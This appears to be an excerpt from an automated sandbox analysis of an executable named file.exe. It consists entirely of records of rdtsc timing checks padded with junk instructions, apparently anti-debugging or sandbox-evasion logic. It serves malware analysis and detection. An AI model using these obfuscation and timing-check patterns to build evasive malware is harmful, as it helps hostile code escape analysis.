                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8C9A2 second address: A8C9BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F8A5 second address: A8F92C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F0B44EA8C76h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0B44EA8C7Bh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0B44EA8C78h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, 7B9F0856h 0x00000032 push 00000000h 0x00000034 or dword ptr [ebp+122D1F25h], ebx 0x0000003a mov ebx, dword ptr [ebp+122D286Fh] 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F0B44EA8C78h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c mov bl, 9Dh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F0B44EA8C84h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E966 second address: A8E96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9091E second address: A9099C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0B44EA8C78h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F0B44EA8C78h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 and edi, dword ptr [ebp+122D28DAh] 0x00000049 push 00000000h 0x0000004b mov dword ptr [ebp+122D2BC7h], eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jl 00007F0B44EA8C78h 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9099C second address: A909A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918DC second address: A918E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A929D5 second address: A929D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AC7 second address: A91AD1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AD1 second address: A91AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F0B44BD79A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91AF0 second address: A91B0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91B0D second address: A91B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A938EB second address: A938FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C7Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A938FC second address: A93900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93900 second address: A9397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F0B44EA8C78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F0B44EA8C78h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D2ACAh], ebx 0x00000047 push 00000000h 0x00000049 add bh, 00000075h 0x0000004c xchg eax, esi 0x0000004d jmp 00007F0B44EA8C83h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jp 00007F0B44EA8C76h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9397F second address: A93983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93983 second address: A9398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95ACA second address: A95ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95ACE second address: A95AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C84h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A95AE8 second address: A95AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A960B3 second address: A960B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97103 second address: A97107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A97107 second address: A97145 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44EA8C78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F0B44EA8C7Bh 0x00000012 mov di, dx 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+122D22EFh], eax 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+1246304Ch], ebx 0x00000026 push eax 0x00000027 pushad 0x00000028 jng 00007F0B44EA8C78h 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 jl 00007F0B44EA8C76h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98037 second address: A9803D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A93B28 second address: A93B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9803D second address: A9804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0B44BD79ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9804A second address: A98056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A96386 second address: A9638D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98FB8 second address: A98FC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B44EA8C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98192 second address: A9819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F0B44BD79A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9824F second address: A98253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A98253 second address: A98259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F3D second address: A99F47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F47 second address: A99F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F4C second address: A99F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F52 second address: A99FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0B44BD79B0h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D209Eh], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0B44BD79A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 call 00007F0B44BD79AEh 0x00000038 mov dword ptr [ebp+122D2935h], ecx 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FB2 second address: A99FB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FB8 second address: A99FBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99FBE second address: A99FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE1E second address: A9AE28 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B44BD79ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE28 second address: A9AE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0B44EA8C76h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A11A second address: A9A11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE39 second address: A9AE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE3D second address: A9AE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9AE43 second address: A9AE4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1AAA second address: AA1AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA1AAE second address: AA1AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA79DA second address: AA79E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7B96 second address: AA7B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEB46 second address: AAEB52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0B44BD79A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEB52 second address: AAEB57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADEE8 second address: AADEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE050 second address: AAE06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B44EA8C89h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE06E second address: AAE07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007F0B44BD79A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE5AA second address: AAE5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE888 second address: AAE898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F0B44BD79A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE898 second address: AAE89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9DB second address: AAE9E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9E1 second address: AAE9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAE9EA second address: AAEA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0B44BD79B9h 0x0000000b popad 0x0000000c jnl 00007F0B44BD79B2h 0x00000012 push edx 0x00000013 jno 00007F0B44BD79A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F4D second address: AB2F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F51 second address: AB2F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F5D second address: AB2F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F0B44EA8C83h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F79 second address: AB2F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2F80 second address: AB2F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30BC second address: AB30D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79ABh 0x00000009 pop edi 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30D1 second address: AB30D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30D6 second address: AB30F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30F5 second address: AB30FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB30FB second address: AB3115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB381B second address: AB3820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DA8 second address: AB3DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B5h 0x00000009 popad 0x0000000a jmp 00007F0B44BD79B0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DD2 second address: AB3DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44EA8C7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3DE5 second address: AB3E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jmp 00007F0B44BD79B0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F0B44BD79ADh 0x0000001c pop edi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3E15 second address: AB3E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0B44EA8C76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68491 second address: A684A5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jno 00007F0B44BD79A6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3967D second address: A39682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB429B second address: AB42AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB42AA second address: AB42C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0B44EA8C7Ch 0x0000000c jp 00007F0B44EA8C76h 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AFB second address: AB2B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B10 second address: AB2B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jl 00007F0B44EA8C86h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B21 second address: AB2B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7B31 second address: AB7B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0B44EA8C78h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A801D2 second address: A678E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F0B44BD79AAh 0x0000000f nop 0x00000010 add dword ptr [ebp+122D1DDBh], edi 0x00000016 call dword ptr [ebp+122D36C3h] 0x0000001c pushad 0x0000001d jbe 00007F0B44BD79AEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80602 second address: A80607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80607 second address: A8060E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A807E4 second address: A807E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A807E8 second address: A80809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80809 second address: A8080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8080E second address: A808A1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44BD79A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f jp 00007F0B44BD79B7h 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 jnp 00007F0B44BD79BEh 0x0000001f jmp 00007F0B44BD79B8h 0x00000024 jmp 00007F0B44BD79B4h 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e jno 00007F0B44BD79B2h 0x00000034 pop eax 0x00000035 or dx, E360h 0x0000003a push C5E9A87Ah 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F0B44BD79B1h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80965 second address: A80981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C88h 0x00000009 rdtsc
